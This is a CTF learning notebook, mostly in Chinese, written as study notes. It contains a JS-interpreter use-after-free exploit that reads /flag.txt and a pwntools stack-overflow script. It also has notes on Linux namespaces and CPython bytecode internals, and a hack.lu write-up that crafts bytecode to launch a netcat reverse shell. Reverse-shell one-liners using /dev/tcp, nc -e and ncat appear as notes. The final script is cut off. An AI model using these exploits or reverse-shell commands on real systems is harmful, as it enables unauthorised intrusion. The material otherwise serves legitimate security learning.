
struct js_Object
{
    char noTcacheOverwrite[0x18]; 
    enum js_Class type;
    int extensible;
    js_Property *properties;
    int count; /* number of properties, for array sparseness check */
    js_Object *prototype;
    union {
....
        struct {
            const char *name;
            js_CFunction function;
            js_CFunction constructor;
            int length;
            void *data; 
            js_Finalize finalize;
        } c;

js_CFunction function; is a function pointer. We then free this object (target in hax.js) but keep a refrence to this object and we allocate it back using:

static void S_fromCharCode(js_State *J)
{
    int i, top = js_gettop(J);
    char * volatile s = NULL;
    char *p;
    Rune c;
    if (js_try(J)) {
        js_free(J, s);
        js_throw(J);
    }
    s = p = js_malloc(J, (top-1) * UTFmax + 1);
    for (i = 1; i < top; ++i) {
        c = js_touint32(J, i);
        p += runetochar(p, &c);
    }
    *p = 0;
    js_pushstring(J, s);
    js_endtry(J);
    js_free(J, s);
}

then we partialy overwrite the function pointer with the addres of static void jsB_read(js_State *J) which will put the content of a file into a JS string. The problem here is the *p = 0; in the C above, as it will insert null terminator in the address. Sooo we just run it enough times for ALSR to pick a address with 0 at that position in the address. also runetochar do some utf8 magic to some of the bytes we put in if outside of ascii range. so prop a bit more than 255 actually.

exp:

JS_CCFUNCTION = 4 /* built-in function */
var a = "";
for (var i = 0; i < 0x20; i++) {
    a += "\x08";
}
var thingy = {};
var dummy1 = {};
var dummy2 = {};
var dummy3 = {};
var dummy4 = {};
var target = quit;
var over = "A";
free(target);
free(thingy);
a.toLowerCase();

var a = ((target.length) & 0xffffff) - 0x2c2;
print(a);

lol = String.fromCharCode(
    0x010000,
    0x010000,
    0x010000,
    0x010000,
    0x010000,
    0x010000,
    JS_CCFUNCTION, /* +0x18 */
    0x41,
    0x41,
    0x41,
    0x010000,      /* +0x1c : extensible */
    0x010000,      /* properties */
    0x010000,
    0x010000,      /* count  */
    0x010000,
    0x0800,      /* prototype  */
    0x43,      /*  */
    0x43,      /*  */
    0x43,
    0x43,
    0x43,
    0x43,
    0x43,
    0x43,
    0x43,
    0x41,
    0x41,
    0x41,
    0x41,
    // partial overwrite start here
    a & 0xff,
    (a >> 8) & 0xff,
    (a >> 16) & 0xff
)

print(target("/flag.txt"));
while(1);
-- EOF --

Escape maze

还没看过.

from pwn import *
conn=remote("65.21.255.31",34979)
r=b'0'
while 1:
    u=conn.recvuntil(b'key number:')
    print(u)
    nr=u.split(b'\n')[-2].split(b' ')[-8].replace(b',',b'')
    if nr!=r:
        conn.sendline(nr)
        r=nr
    else:
        conn.sendline(u.split(b'\n')[1].split(b' ')[-1])

CSR 2022

PWNMEPLX

CSR 2022

┌──(root💀kali)-[/mnt/LearingList/CTF/PWNMEPLX]
└─# checksec pwn             
[*] '/mnt/LearingList/CTF/PWNMEPLX/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

这个是取绝对值的x64汇编写法:

.text:0000000000401336 8B 45 8C                                   mov     eax, [rbp+var_74]
.text:0000000000401339 99                                         cdq
.text:000000000040133A 89 D0                                      mov     eax, edx
.text:000000000040133C 33 45 8C                                   xor     eax, [rbp+var_74]
.text:000000000040133F 29 D0                                      sub     eax, edx
.text:0000000000401341 C9                                         leave
.text:0000000000401342 C3                                         retn

简单的栈溢出覆盖返回地址居然因为<__vfscanf_internal+133>处的xmmword需要0x10字节对齐而出错…

简单的不想多说. 但是还是做了好一会儿, 还在想是不是符号/浮点数的问题, 结果就是一个简单的后门栈溢出.

这个比赛的pwn题全都是签到, 差点意思.

from pwn import *
context.binary = './pwn.elf64'
context.log_level = 'debug'
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv one
rn=lambda x:p.recv(x)       #recv n
sla=lambda x,y:p.sendlineafter(x,y)
itt=lambda :p.interactive()
c = 0
if c == 0:
    p = remote("chall.rumble.host", 5415)
else:
    p = process("./pwn.elf64")

payload = b'b'*(112+8) + pack(0x401348, 64)
sl(b"-1")
sl(payload)
itt()

PWNFORTRESS

同上, 不过题目是rev+game. 基本不会

主要问题是明确了glibc版本, 但是ubuntu的2.3几之后的全都是用.zst压缩, dpkg无法解压, 改成了清华源中debian的glibc库, 然后dbg版本的包里面也没有带符号的库文件. 不知道怎么用了, 分析了半天glibc-all-in-one代码不知道怎么改, 索性就没有符号吧. 不过在ubuntu2022里直接运行.

debian glibc file catagory | tuna mirror site

不会做.

unintended solution:

breakpoint before the level is printed, make it print the last level instead, it will segfault, but the decoded map is in memory


随便看到一题都有三个标签, cry, misc, pwn, 没接触过的加密和杂项, 属实不会, 还有一些虚拟机逃逸加上什么RISC-JIT之类没听说过的技术. 到处都是知识盲区.

Hackergame 2022

简单题略过了, 不太想花时间. 能做的学不到东西, 能学到的基本不会做.

猫咪问答: 懒得做. 旅行图片: 社工懒得做. 纯耗时间.

签到: mousedown的事件监听的touchStart函数加上一个logpoint让lefttime不变

HeiLang: 无聊的语法转换

Flag自动机: 是window程序, 看了看IDA的反编译代码后发现有消息回调函数, 在cheat engine里让x, y变得不随机, 然后改一个变量进入flag生成.

One-byte-man

挺神奇的, 代码里面又是还没看的linux概念…

  • prctl参数PR_SET_CHILD_SUBREAPER: 设置进程树属性, 使得树中孤儿被收养到最近的设置了属性的父进程处.
    因为该属性只能通过execve继承而非fork和clone.

  • 认真看了下namespace的man page. CLONE_NEW*一系列flag.

  • user_namespace: A process’s user and group IDs can be different inside and outside a user namespace.

    • namespace是一个树状继承图. 像是setns和unshare和clone可以开辟新的子namespace
    • User and group ID mappings: uid_map and gid_map
      • root namespace的两个文件中可以见到0 0 4294967295, 第三个是有符号数的-1, 其实是指一个length, 这一段的uid都被map了. Since Linux 4.15每个进程可有340行映射.
      • 不同namespace的process访问同一个process的uid_map文件可能会产生不同的结果.
      • 因为该行是一个映射, 当访问文件在同一个namespace指内部uid -> 父space uid, 当在不同namespace时指内部uid -> 访问进程space uid
      • 写入的程序必须在父space或者同一个space; 被映射的uid在进程space内也必须有map; 有相应的caps.
    sudo echo '0 1000 1\n1000 0 1' > /proc/121634/uid_map
    
    • The /proc/[pid]/setgroups file
      • setgroups() sets the supplementary group IDs for the calling process.
      • gid_map没设置以及上面的文件显示"deny"时, 不能用setgroups()
      • gid_map设置之后(setgroups已确定是否启用)不能通过写入任何字符来改变.
        进程只能从禁止setgroups(未map)变化到允许setgroups(写入allow)
      • 在Linux 3.19被加入. 解决了"rwx—rwx"文件的问题. 即换到other user反而提权了, by denying any pathway for an unprivileged process to drop groups with setgroups(2).
    • /proc/sys/kernel/overflowuid: 未map时尝试读取uid会显示的数字. 在uid_map第二个field没有map时也可能显示4294967295.
    • 权限检查时uid会转换到initial user namespace中的uid.
  • capabilities:

    • 进程有四个set, 文件有p和i加上一个effective bit.
    • 四个set看了老半天不知道实际是如何操作的, 只有effective和bounding能看明白. bounding应该是个全集, 不过也能够对其进行删减, 意义不明. permitted set应该为该进程允许获得的caps. ambient更是完全不懂.
    • 下图是执行execve时cap的变化情况. 注意到当文件effective bit为1时文件的permitted加入了effective set, 这也是一些blog演示ping文件的利用之处, 即cap_net_raw+ep; 这和ambient有啥不同?
  • credentials

    • 看到还有个Filesystem user ID and filesystem group ID, 只能说不知道有什么用, 只看到是和supplementary group IDs一起用于判断文件access permissions.
    • Supplementary group IDs: 一个用户属于一个primary group, 同时又属于多个Supplementary group, 这样就不用切换了, 主要是省事. 在id命令第一个group后面跟着的东西就是.
  • capsh getcap setcap getpcapsgrep Cap /proc/self/status

看不见的彼方

额, 先看rust去了.

hack.lu 2022

ordersystem

start

一眼看到python中socket.socket() 先查一下以前没注意的东西.

  • setsockopt使用场景: link

  • reuseaddr/reuseport: 查询过程源码 reuseport版本演进

  • bind到 0.0.0.0, 127.0.0.1 localhost 有何区别

  • 在docker环境上遇到一点小问题, 重新build了一下. woc为什么链接没反应?? 好吧重启解决问题了. service docker restart

  • 反弹shell

    • 目标要执行的命令: bash -i >& /dev/tcp/192.168.1.102/7777 0>&1: 将目标主机的bash shell以-i交互式的方式,标准输出+错误输出重定向到192.168.1.102:7777,而在192.168.1.102:7777的标准输入命令会重定向到192.168.1.102:7777的标准输出中)

      简言而知,就是将目标主机的标准输入、标准输出、错误输出全都重定向到攻击端上

    • 上面这种是通过bash命令来反弹shell, 还可以通过python nc perl php命令来reverse.
      nc 192.168.100.113 4444 –e /bin/bash

      python -c ‘import socket,subprocess,os;................’

    • 而主机要执行nc –lvp 4444命令来监听特定端口号.

  • python的bytecode真没了解过, 要暴毙了. 这能上哪儿搜. 跟cpython有挺大关系. 又查到了python vm. 又是python的fundamental, 我要疯了怎么又来这么多的东西. 一看就是一星期的量ahhhhhhhhhhhhhhhhhhhhh

Bytecode relavant:

到处查东西, 写的挺乱的. 还是python innards部分能看一点.

  • python built-in function: the last one is __import__, This function is invoked by import statements. Direct use of __import__() is also discouraged in favor of importlib.import_module()
    • e.g. __import__('os').system(b"ncat *.*.*.*" "****" "-e /bin/sh")
  • ops:
    • LOAD_FAST(var_num): Pushes a reference to the local co_varnames[var_num] onto the stack.
    • STORE_FAST(var_num): Stores TOS into the local co_varnames[var_num].
    • RETURN_VALUE Returns with TOS to the caller of the function.
    • 可通过dis.opmap查询inst编码. 想了一小时怎么弄… 第二个字节是操作数, 就是dis结果的第二个数字.
    • BUILD_TUPLE(count): Creates a tuple consuming count items from the stack, and pushes the resulting tuple.
    • CALL_FUNCTION(argc): pops all arguments and the callable object, makes call, and pushes the return value.
      • 我真没看出来哪里把参数全部pop出来了…可能是函数内部操作的, switch里call_function后有对stack_pointer的重新赋值.
      • 特别的是比如print函数是没有返回值的, 但此时仍会有值为None的PyObject*被压入栈中. 在本题中令其参数为0个, 可作为None的一种压入方式.
    • LOAD_METHOD(namei): Loads a method named co_names[namei] from the TOS object. TOS is popped.
      • if TOS has a method with the correct name, the bytecode pushes the unbound method and TOS. TOS will be used as the first argument (self) by CALL_METHOD when calling the unbound method.
      • Otherwise, NULL and the object return by the attribute lookup are pushed.
    • CALL_METHOD(argc) 这个参数显而易见了.
      • Positional arguments are on top + two items described in LOAD_METHOD
        (either self + an unbound method object or NULL + an arbitrary callable)
      • 直接在3.11消失了. 和LOAD_METHOD进行搭配的是PRECALL. 真是每个版本都不一样… 到时候再看吧.
    • IMPORT_NAME(namei): Imports the module co_names[namei]. TOS and TOS1 are popped and provide the fromlist and level arguments of __import__(). The module object is pushed onto the stack. 实际上TOS1 不需要pop, 只要引用下然后直接修改成返回值即可.
      • IMPORT_NAME之后通常会STORE_FAST来暂存, 需要调用os.system这样的时候就LOAD_FAST来为LOAD_METHOD获取os module.
      • 还发现了IMPORT_STAR IMPORT_FROM, 前者是从TOS上import所有symbols , 后者是从TOS上import特定, 和上面这个只import module的明显不同.
  • 下面是示例, 在每个CALL_FUNCTION之前都load了函数和参数, 最终操作数为参数的个数(15行的"1").
In [1]: def test():
   ...:     print("test string")
    
In [2]: def test_test():
   ...:     test()
   ...:     print("test_test string")

In [3]: import dis
In [4]: dis.dis(test_test)
  2           0 LOAD_GLOBAL              0 (test)
              2 CALL_FUNCTION            0
              4 POP_TOP
  3           6 LOAD_GLOBAL              1 (print)
              8 LOAD_CONST               1 ('test_test string')
             10 CALL_FUNCTION            1                     
             12 POP_TOP                                        
             14 LOAD_CONST               0 (None)              
             16 RETURN_VALUE                                   
  • 看了一圈我都不知道什么叫Calls the function in position 7 on the stack with the top three items on the stack as arguments.
    4 5 6这三个位置就没用了?? 合着原来是填充. 我想我还是看看python innards比较好…虽然是10年的post
    然后发现在3.11的文档里是position 4. 啊这? 可能是预留位置防止后来加入东西

    下面是cpython源码. main分支上的不在ceval.c中, 因为case语句太长就直接分成一个单独的文件generated_cases.c.h, 其余版本号分支仍在ceval. 已下载cpython 3.11源码, 可以看到一些定义之类的东西.
    • exception below: python doc
    • exc_info(): 没看明白这是个什么东西, 只知道sys.exc_info()有后向兼容性, 现在更多的是使用traceback(?不确定是哪个traceback)
//branch 3.11:
		TARGET(WITH_EXCEPT_START) {
            /* At the top of the stack are 4 values:
               - TOP = exc_info()
               - SECOND = previous exception
               - THIRD: lasti of exception in exc_info()
               - FOURTH: the context.__exit__ bound method
               We call FOURTH(type(TOP), TOP, GetTraceback(TOP)).
               Then we push the __exit__ return value.
            */
            PyObject *exit_func;
            PyObject *exc, *val, *tb, *res;

            val = TOP();
            assert(val && PyExceptionInstance_Check(val));
            exc = PyExceptionInstance_Class(val);
            tb = PyException_GetTraceback(val);
            Py_XDECREF(tb);
            assert(PyLong_Check(PEEK(3)));
            exit_func = PEEK(4);
            PyObject *stack[4] = {NULL, exc, val, tb};
            res = PyObject_Vectorcall(exit_func, stack + 1,
                    3 | PY_VECTORCALL_ARGUMENTS_OFFSET, NULL);
            if (res == NULL)
                goto error;

            PUSH(res);
            DISPATCH();
        }

//but in branch 3.9-10:
            /* At the top of the stack are 7 values:
               - (TOP, SECOND, THIRD) = exc_info()
               - (FOURTH, FIFTH, SIXTH) = previous exception for EXCEPT_HANDLER
               - SEVENTH: the context.__exit__ bound method
               We call SEVENTH(TOP, SECOND, THIRD).
               Then we push again the TOP exception and the __exit__
               return value.
            */

Python backgrounds & Innards

一些太通用的东西挪到这里来了.

关于python编译系统内部原理的一些链接, 暂时可以不用关注: (不看啥也不知道, 又滚回来看了…

  • stackoverflow: bytecode instance | theory. 一篇巨长的文章, 连指令都全部列出来.
  • Wiki: stack machine vs. register machine
    • Instruction formats are classified into different types depending upon the CPU organization. CPU organization is again classified into three types based on internal storage: Stack machine, Accumulator machine, General purpose organization or General register.
    • Stack machines extend push-down automata(下推自动机) with additional load/store operations or multiple stacks and hence are Turing-complete.
    • 开始看到上下文无关语法等等, 快死去的记忆开始攻击我. 一时看不完wiki, 找点浅显易懂的文章来. stackmachine book | Geek
  • python compiler design : developer官方文档, 这里面好多, 但是看起挺有用…看了也不知道说啥. 还是看他的reference文章.
  • python innards : 讲解ceval.c内容.
  • 还可以看看python C API.
  • 还可以看看python reference的data model

真的好乱, 看到啥记下啥了.

Misc:
  • The function definition’s body is compiled into a code object. Then the function definition itself is compiled into code (inside the enclosing function body, module, etc.) that, when executed, builds a function object from that code object. (Once you think about how closures must work, it’s obvious why it works that way. Each instance of the closure is a separate function object with the same code object.)

  • dis module: bytecode instructions

    • Changed in version 3.6: Use 2 bytes for each instruction. Previously the number of bytes varied by instruction.

      Changed in version 3.10: The argument of jump, exception handling and loop instructions is now the instruction offset rather than the byte offset.

  • get information about live objects: Inspect

    • Types and members :function.__code__.co_code to get code bytestring or inspect.getmembers([func/module/class]) to see all members.
  • python built-in function: eval & exec. difference: eval accepts only a single expression, exec can take a code block

  • METHOD

    • python的method是指在class里的, 而function就是字面意思.
    • bound methods: a function is an attribute of class and it is accessed via the instances(common case)
    • unbound methods: Methods that do not have an instance of the class as the first argument. As of Python 3.0, the unbound methods have been removed from the language. They are not bounded with any specific object of the class. To make the method work it should be made into a static method.
  • use decorator@staticmethod or staticmethod().

  • PyObject:

    • All Python objects ultimately share a small number of fields at the beginning of the object’s representation in memory. 这些字段就是指的PyObject, 所有object type都是该类型的扩展, 而且对外只使用PyObject*这种类型.
    • PyVarObject is an extension of PyObject that adds the ob_size field. This is only used for objects that have some notion of length. 比如说PyTupleObject的头部就是一个PyVarObject ob_base.
    • co_names是PyTuple类型的, 使用names = PyTuple_New(n);进行初始化.
  • Data model

    • Module: A module object has a namespace implemented by a dictionary object (this is the dictionary referenced by the __globals__ attribute of functions defined in the module). Attribute references are translated to lookups in this dictionary, e.g., m.x is equivalent to m.__dict__["x"]. A module object does not contain the code object used to initialize the module (since it isn’t needed once the initialization is done).
    • Function: 不是很重要.
    • Objects are Python’s abstraction for data. Every object has an identity, a type and a value. An object’s type determines the operations that the object supports (e.g., “does it have a length?”) and also defines the possible values for objects of that type.

除了python innards, 这一篇三年前写的比较新一点. 还有一些图解, 真不错.

Intro & AST
  • src structure(in Linux platform)

    • Include — header files
    • Objects — object implementations, from int to type
    • Python — interpreter, bytecode compiler and other essential infrastructure
    • Parser — parser, lexer and parser generator
    • Modules — stdlib extension modules, and main.c
    • Programs — not much, but has the real main() function

    when it comes to modern windows, lookup PCBuild — Tools to build Python for modern Windows using Visual Studio

  • 一时不知道要看哪个…先看看最新的这个吧.

  • Grammar is written in BNF. https://en.m.wikipedia.org/wiki/Backus%E2%80%93Naur_form

  • 解释器工作流程:

Python run swim lane diagram
  • AST直接跳过了, 看看object type之类的定义. 就比如stack其实是PyObject *类型的一样.
  • The PyAST_CompileObject() function is the main entry point to the CPython compiler.
  • But before the compiler starts, a global compiler state is created
struct compiler {
    PyObject *c_filename;
    struct symtable *c_st;
    PyFutureFeatures *c_future; /* pointer to module's __future__ */
    PyCompilerFlags *c_flags;

    int c_optimize;              /* optimization level */
    int c_interactive;           /* true if in interactive mode */
    int c_nestlevel;
    int c_do_not_emit_bytecode;  /* The compiler won't emit any bytecode
                                    if this value is different from zero.
                                    This can be used to temporarily visit
                                    nodes without emitting bytecode to
                                    check only errors. */

    PyObject *c_const_cache;     /* Python dict holding all constants,
                                    including names tuple */
    struct compiler_unit *u;	 /* compiler state for current block */
    PyObject *c_stack;           /* Python list holding compiler_unit ptrs */ //notice this line!!!!!!!!!!!!!!!!!
    PyArena *c_arena;            /* pointer to memory allocation arena */
};
  • then PyAST_CompileObject does the following things:
    • some flag initializations …
    • Build a symbol table from the module object.
    • Run the compiler with the compiler state and return the code object.
    • Free any allocated memory by the compiler.
symbol table
  • In PyAST_CompileObject() there was a reference to a symtable and a call to PySymtable_BuildObject() with the module to be executed. The purpose of the symbol table is to provide a list of namespaces, globals, and locals for the compiler to use for referencing and resolving scopes.
Core Compilation Process
  • Now that the PyAST_CompileObject() has a compiler state, a symtable, and a module in the form of the AST, the actual compilation can begin.
  • in cpython 3.11 branch, the PyCodeObject is in Include\cpython\code.h and is a macro.
  • 放弃了, 暂时没帮助的编译细节.
Assembly

如名, 没啥特别的.

Conclusion

编译大致过程, 知道这个就行了

Execution
  • This stage forms the execution component of CPython. Each of the bytecode operations is taken and executed using a “Stack Frame” based system.
  • Before a frame can be executed, it needs to be referenced from a thread. CPython can have many threads running at any one time within a single interpreter. An Interpreter state includes a list of those threads as a linked list. The thread structure is called PyThreadState, and there are many references throughout ceval.c.
Frame Execution
  • Frames are executed in the main execution loop inside _PyEval_EvalFrameDefault(). This function is central function that brings everything together and brings your code to life. It contains decades of optimization since even a single line of code can have a significant impact on performance for the whole of CPython.
The Value Stack

我想看到的东西.

  • PyObject **stack_pointer指向栈顶的上一个位置.
  • switch in ceval.c:
    • any operation that fails must goto error, all operation that succeed call DISPATCH()
    • DISPATCH(): if tracing is enabled, do the trace, if tracing is not enabled, a goto is called to dispatch_opcode, which jumps back to the top of the loop for the next instruction.
    • PREDICT() macro will do the same as it says. When the prediction succeeds, it means execution flow haven’t to go through the loop again.
  • Some of the operations, such as CALL_FUNCTION, CALL_METHOD, have an operation argument referencing another compiled function. In these cases, another frame is pushed to the frame stack in the thread, and the evaluation loop is run for that function until the function completes. Each time a new frame is created and pushed onto the stack, the value of the frame’s f_back is set to the current frame before the new one is created.

ordersystem wp1 wp2:

src
  • 用字典类型ENTRIES来保存输入的信息. 其中key最多12字节, 可以是任意bytes, 但是data只能是printable hex number, 长度为0-255.
  • 可保存data到storage文件夹中的key.decode或者key.hex(作为文件名称), 还可以directory traversal到plugins文件夹中.
  • 执行plugins时读取相应bytecode文件, 将所有key加上plugin_log(msg,filename='./log',raw=False)放到codeType的consts中, 将bytecode后面使用分号隔开的bytes放到names中.
    其中log函数可做到将第一个参数的内容(无限制)写入./log文件. 最后exec()执行代码. 但是, 注意调用log函数时第一个参数msg只能是来自co_const, 而consts又是从key中获取.

docker安装的python版本是3.10.6

problem
  • because of the hexdump executed by server, we can only send printable hex numbers, which dramatically lessens our options.
    notice that the code in block is actually a condition statement…

    In [1]: import dis
       ...: {
       ...:     hex(op_code): op_name
       ...:     for op_name, op_code in dis.opmap.items()
       ...:     if chr(op_code) in "0123456789abcdef"
       ...: }
    Out[1]:
    {'0x31': 'WITH_EXCEPT_START',
     '0x32': 'GET_AITER',
     '0x33': 'GET_ANEXT',
     '0x34': 'BEFORE_ASYNC_WITH',
     '0x36': 'END_ASYNC_FOR',
     '0x37': 'INPLACE_ADD',
     '0x38': 'INPLACE_SUBTRACT',
     '0x39': 'INPLACE_MULTIPLY',
     '0x61': 'STORE_GLOBAL',
     '0x62': 'DELETE_GLOBAL',
     '0x63': 'ROT_N',
     '0x64': 'LOAD_CONST',
     '0x65': 'LOAD_NAME',
     '0x66': 'BUILD_TUPLE'}
    
  • but the WITH_EXCEPT_START is something special.

    WITH_EXCEPT_START: Calls the function in position 7 on the stack with the top three items on the stack as arguments. Used to implement the call context_manager.__exit__(*exc_info()) when an exception has occurred in a with statement.

    • with statement(有更多东西) | context manager
    • 通过with语句的流程看出来貌似在with_statement evaluate之后的值自带manager, 比如open()返回的file object中就有__enter__函数, 而且enter也不需要做什么就直接返回file object. 而__exit__就是直接调用close()
                /* At the top of the stack are 7 values:
                   - (TOP, SECOND, THIRD) = exc_info()
                   - (FOURTH, FIFTH, SIXTH) = previous exception for EXCEPT_HANDLER
                   - SEVENTH: the context.__exit__ bound method
                   We call SEVENTH(TOP, SECOND, THIRD).
                   Then we push again the TOP exception and the __exit__
                   return value.
                */
    

下面这个流程也是不断的修改之后才成功的…

  1. Calculate proof of work to get the real target port, 使用docker完全见不到.
  2. Craft python bytecode which will spawn a reverse shell to the attacker’s machine as exp_bc
  3. Divide exp_bc into chunks of 12 bytes
  4. Upload the filling consts to 0x30 items.
  5. Upload num_chunk plugins and dump()
  6. Store exp_bc as keys in the storage
  7. Run one plugin for each chunk which appends the key to the logfile aka exploit plugin
  8. Upload nc command string.
  9. Run the exploit plugin
proof of work

?

reverse shell
# This is the index where we will later store the nc command
nc_index = 55
co_names = ["len", "list", "print", "os", "system", "decode"]
exploit_asm = [
    # Get length of empty list to push 0 on the stack
    ("BUILD_LIST", 0),
    # Use NOP as arg to simplify compiler ?????what is nop?? 不就是压入了一个long类型的0吗, 这个指令不需要参数.
    ("GET_LEN", 0x09),
    # Invoke print() to push None onto the stack
    ("LOAD_NAME", co_names.index("print")),
    ("CALL_FUNCTION", 0),
    # Import os
    ("IMPORT_NAME", co_names.index("os")),
    # Invoke os.system()
    ("LOAD_METHOD", co_names.index("system")),
    # Decode first batch of nc command
    ("LOAD_CONST", nc_index),	#load了一个string object, 所以可以在他之上调用decode函数.
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode second batch of nc command
    ("LOAD_CONST", nc_index + 1),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode third batch of nc command
    ("LOAD_CONST", nc_index + 2),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Concatenate the three strings
    ("BUILD_STRING", 3),
    # Finaly invoke the nc command
    ("CALL_METHOD", 1)
]

Then, we can “assemble” the code:

exp_bc = b''
for op, arg in exploit_asm:
    exp_bc += bytes([dis.opmap[op], arg])
for name in co_names:
    exp_bc += b';' + name.encode()
exp_bc += b';'

可以看出来指令非常的简单, 就是一个字节指令加上一个字节操作数.

  • 为什么是分号? 是题目源码中识别到有分号时自动把names加入到CodeObject.names
  • 还要注意到nc_index, 这是在upload所有的key之后才确定下来的偏移, 因为limit_code的操作数必须是在printable hex的范围之内, 所以干脆把nc命令的这一个字符串和limit_code的参数放到consts[0x30:0x40]的部分.
  • 这里有个坑(自己作的)就是在第二个for之前也在bc后面加上了分号, 导致co_names的第一个就是空字节串, 所有的idx都不对了, 看到了什么No module named 'print'这种神奇报错.
  • 比较疑惑的是print只是个字符串, 为什么会被CALL_FUNCTION当做是callable? 原来load_name不仅是从names中取出了名称字符串, 而且在local和global两个scope中查找到了对应的item, 这里的print对应的是一个callable item, 自然是可以被CALL_FUNCTION调用的. !!
填充consts前48个位置
#fill slots
chunk_size = 12
num_chunks = len(exp_bc) // chunk_size + 1
# num_chunk is 6, limit_code is 6, total is 12, and plugin_log will be 13
for i in range(48 - num_chunks):
    upload_key(b'{{{{{{{{{{%d' % (i+10))

48=0x30, 为了把数据放在\x30中, 先把前面的部分填满, 最后剩下6个位置放入

Upload limit_code
#upload limit_code as serveral plugins in data
func_idx = 48+6+1
msg_idx = 0x30
fn_idx = 0x30+6
raw_idx = 0x30
for i in range(num_chunks):
    bc = get_plugin_code(i+msg_idx, func_idx, fn_idx, raw_idx)
    store(b'../plugins/%d' % i, bc)
dump()

这些idx都是事后填上的. 其中raw是随便一个不为空的变量, func_idx是最后一个consts.

还有一个问题是func_idx已经是55, 后面的command的三个位置已经放不下, 所以执行完六个plugins后才能上传命令.

Upload exploit bytecode in chunks
exp_bc = exp_bc.ljust(num_chunks*chunk_size, b';')
exp_block = []
for i in range(0, len(exp_bc), chunk_size):
    exp_block.append(exp_bc[i:i+chunk_size])
    upload_key(exp_block[-1])

把exp分成chunk上传到keys中后, 再上传多个limit_code作为plugin, 用于将每个key中的exp_bc附加到log(其实是./plugins)后面, 拼接成exp.

  • 要注意的是keys加入consts的时候是通过遍历dict来实现的, 所以consts顺序是字典序从大到小.for遍历输出居然是按照加入的顺序, 测试的时候是直接赋初值然后输出, 结果是字典序. 最后是plugin_log函数object. 这导致每个limit_code中msg的偏移都不一样, 但filename和raw是一样的.
  • 也不对啊, for k in entries这样取出来的是字典中的tuple, 这一个tuple怎么load_const再decode?

python不过关, 做题两行泪: list(dict)只会返回key, 而for k in dict同理…

iter(d): Return an iterator over the keys of the dictionary. This is a shortcut for iter(d.keys()).

>>>d
{'one': 1, 'two': 2, 'three': 3, 'four': 4}
>>>list(d)
['one', 'two', 'three', 'four']
>>>list(d.values())
[1, 2, 3, 4]
Upload additional consts & construct ./expl &
#used for plugins
upload_key(b'plugins/expl')

#exec plugins to store exp to plugins/expl
for i in range(6):
    plugin(f'../plugins/{i}'.encode())

#used for ./expl
ip = '127.0.0.1'
rev_port = 5555
commmand = f"nc {ip} {rev_port} -e /bin/sh".ljust(chunk_size * 3, " ")
upload_key(commmand[:chunk_size])
upload_key(commmand[chunk_size : 2 * chunk_size])
upload_key(commmand[2 * chunk_size :])

为什么两个upload中间夹个plugin在上面解释了.

REVERSE SHELL
rev_shl = listen(rev_port)
plugin(f'expl'.ljust(12, ' ').encode())
rev_shl.sendline(b'echo $flag')
flag = rev_shl.recvline(False)
log.success(flag)

其实行不通, 不知道容器里面的程序要怎么连接到主机里已在监听的接口. 实际上还要一个公网IP才能反弹, 还没接触过.

本地是在container里面验证过了exp.

complete exp:

from pwn import *
import dis
context.log_level = 'info'
context.arch = 'amd64'

def store(key: bytes, data: bytes):
    assert len(key) <= 12, 'store key len'
    assert len(list(filter(lambda x: x in '0123456789abcdef', data.decode()))
               ) == len(data) and len(data) < 0x80, "data has to be in hex format"
    p = remote('127.0.0.1', 4444)
    p.send(b'S')
    p.send(key)
    p.send(chr(len(data)))
    p.send(data)
    p.recvuntil(f'{key}\n'.encode(), timeout=1)
    p.close()
def dump():
    p = remote('127.0.0.1', 4444)
    p.send(b'D')
    p.clean()
    p.close()
def plugin(name):
    assert len(name) == 12
    p = remote('127.0.0.1', 4444)
    p.send(b'P')
    p.send(name)
    p.clean(timeout = 0.3)
    p.close()
def load_const(idx):
    return bytes([dis.opmap['LOAD_CONST'], idx])
def load_name(idx):
    return bytes([dis.opmap['LOAD_NAME'], idx])
def upload_key(key):
    if isinstance(key, str):
        key = key.encode()
    store(key, b'deadbeef')
def get_plugin_code(msg_idx, func_idx, fn_idx, raw_idx):
    log.success(f'four args: {msg_idx} {func_idx} {fn_idx} {raw_idx}')
    return (
        #load seventh callable to plugin_log + unused 456
        load_const(func_idx) * 4 +
        #load top three args
        load_const(raw_idx) + load_const(fn_idx) + load_const(msg_idx) +
        #call log()
        bytes([dis.opmap['WITH_EXCEPT_START'], 0x30])
    )

# This is the index where we will later store the nc command
nc_index = 55
co_names = ["len", "list", "print", "os", "system", "decode"] #, '0', '1', '2', '3', '4', '5']
exploit_asm = [
    # Get length of empty list to push 0 on the stack
    ("BUILD_LIST", 0),
    # Use NOP as arg to simplify compiler ?????what is nop?? 不就是压入了一个long类型的0吗, 这个指令不需要参数.
    ("GET_LEN", 0x09),
    # Invoke print() to push None onto the stack
    ("LOAD_NAME", co_names.index("print")),
    ("CALL_FUNCTION", 0),
    # Import os
    ("IMPORT_NAME", co_names.index("os")),
    # Invoke os.system()
    ("LOAD_METHOD", co_names.index("system")),
    # Decode first batch of nc command
    ("LOAD_CONST", nc_index),	#load了一个string object, 所以可以在他之上调用decode函数.
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode second batch of nc command
    ("LOAD_CONST", nc_index + 1),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Decode third batch of nc command
    ("LOAD_CONST", nc_index + 2),
    ("LOAD_METHOD", co_names.index("decode")),
    ("CALL_METHOD", 0),
    # Concatenate the three strings
    ("BUILD_STRING", 3),
    # Finaly invoke the nc command
    ("CALL_METHOD", 1)
]

exp_bc = b''
for op, arg in exploit_asm:
    exp_bc += bytes([dis.opmap[op], arg])
for name in co_names:
    exp_bc += b';' + name.encode()
exp_bc += b';'

#fill slots
chunk_size = 12
num_chunks = len(exp_bc) // chunk_size + 1
# num_chunk is 6, limit_code is 6, total is 12, and plugin_log will be 13
for i in range(48 - num_chunks):
    upload_key(b'{{{{{{{{{{%d' % (i+10))

#upload limit_code as serveral plugins in data
func_idx = 48+6+1
msg_idx = 0x30
fn_idx = 0x30+6
raw_idx = 0x30
for i in range(num_chunks):
